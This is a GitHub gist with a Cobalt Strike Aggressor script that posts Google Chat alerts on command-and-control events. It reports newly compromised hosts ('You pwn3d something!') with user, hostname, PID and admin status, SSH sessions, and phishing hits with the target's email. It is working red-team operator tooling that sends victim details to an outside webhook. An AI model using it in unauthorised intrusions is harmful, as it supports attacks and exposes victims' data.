Created
February 17, 2021 22:23
-
-
Save byt3bl33d3r/10b4db86bc19b849746a60a94d15bc40 to your computer and use it in GitHub Desktop.
Cobalt Strike Aggressor script that sends message to Google Chat on key events
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Original script by @Und3rf10w and @vysecurity | |
| # Modded by @byt3bl33d3r for Google Chat | |
| import java.net.URLEncoder; | |
| import java.io.BufferedReader; | |
| import java.io.DataOutputStream; | |
| import java.io.InputStreamReader; | |
| import java.net.HttpURLConnection; | |
| import java.net.URL; | |
| sub sendhttp{ | |
| $method = $1; | |
| $url = $2; | |
| $body = $3 . "\r\n"; | |
| $USER_AGENT = "Mozilla/5.0"; | |
| $CONTENT_TYPE = "application/json; charset=UTF-8"; | |
| $urlobj = [new URL: $url]; | |
| $con = [$urlobj openConnection]; | |
| [$con setRequestMethod: $method]; | |
| [$con setRequestProperty: "User-Agent", $USER_AGENT]; | |
| [$con setRequestProperty: "Content-Type", $CONTENT_TYPE]; | |
| [$con setDoOutput: true]; | |
| $wr = [new DataOutputStream: [$con getOutputStream]]; | |
| [$wr writeBytes: $body]; | |
| [$wr flush]; | |
| [$wr close]; | |
| $responseCode = [$con getResponseCode]; | |
| $in = [new BufferedReader: [new InputStreamReader: [$con getInputStream]]]; | |
| $inputLine = ""; | |
| $response = ""; | |
| $inputLine = [$in readLine]; | |
| $response = $response . $inputLine . "\r\n"; | |
| while ($inputLine ne ""){ | |
| $inputLine = [$in readLine]; | |
| $response = $response . $inputLine . "\r\n"; | |
| } | |
| [$in close]; | |
| return $response; | |
| } | |
| on ready { | |
| elog("Google Chat notifications are now configured"); | |
| } | |
| #on event_notify { | |
| # $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); | |
| # send_message("$time $+ : $1"); | |
| #} | |
| on event_join { | |
| $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); | |
| send_message("$time $+ : $1 has joined"); | |
| } | |
| on event_action { | |
| $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); | |
| send_message("$time $+ : < $+ $3 $+ >: $1 "); | |
| } | |
| #on event_quit { | |
| # $time = formatDate($2, "yyyy.MM.dd 'at' HH:mm:ss z"); | |
| # send_message("$time $+ : $1 has quit"); | |
| #} | |
| on beacon_initial { | |
| if (-isadmin $1){ | |
| send_message("You pwn3d something!\n\tAdmin: Yes\n\tID: $1\n\tUser: " . binfo($1, "user") . "\n\tHostname: " . binfo($1, "computer") . "\n\tPID: " . binfo($1,"pid") . "\n\tHost: " . binfo($1,"host")); | |
| } | |
| else { | |
| send_message("You pwn3d something!\n\tAdmin: No\n\tID: $1\n\tUser: " . binfo($1, "user") . "\n\tHostname: " . binfo($1, "computer") . "\n\tPID: " . binfo($1,"pid") . "\n\tHost: " . binfo($1,"host"));; | |
| } | |
| } | |
| on ssh_initial { | |
| send_message("New SSH Session!\n\tID: $1\n\tHostname " . binfo($1, "computer")); | |
| } | |
| on profiler_hit { | |
| send_message("Profiler Hit Received!\n\tExternal: $1\n\tInternal: $2\n\tUA: $3\n\tEmail: " . tokenToEmail($5)); | |
| } | |
| on web_hit { | |
| send_message("Web hit to URL: " . $2) | |
| } | |
| sub send_message { | |
| $webhook_url = "GOOGLE_CHAT_WEBHOOK_URL"; | |
| $message = $1; | |
| $body = "{ \"text\": \"" . $message . "\" }"; | |
| sendhttp("POST", $webhook_url, $body); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment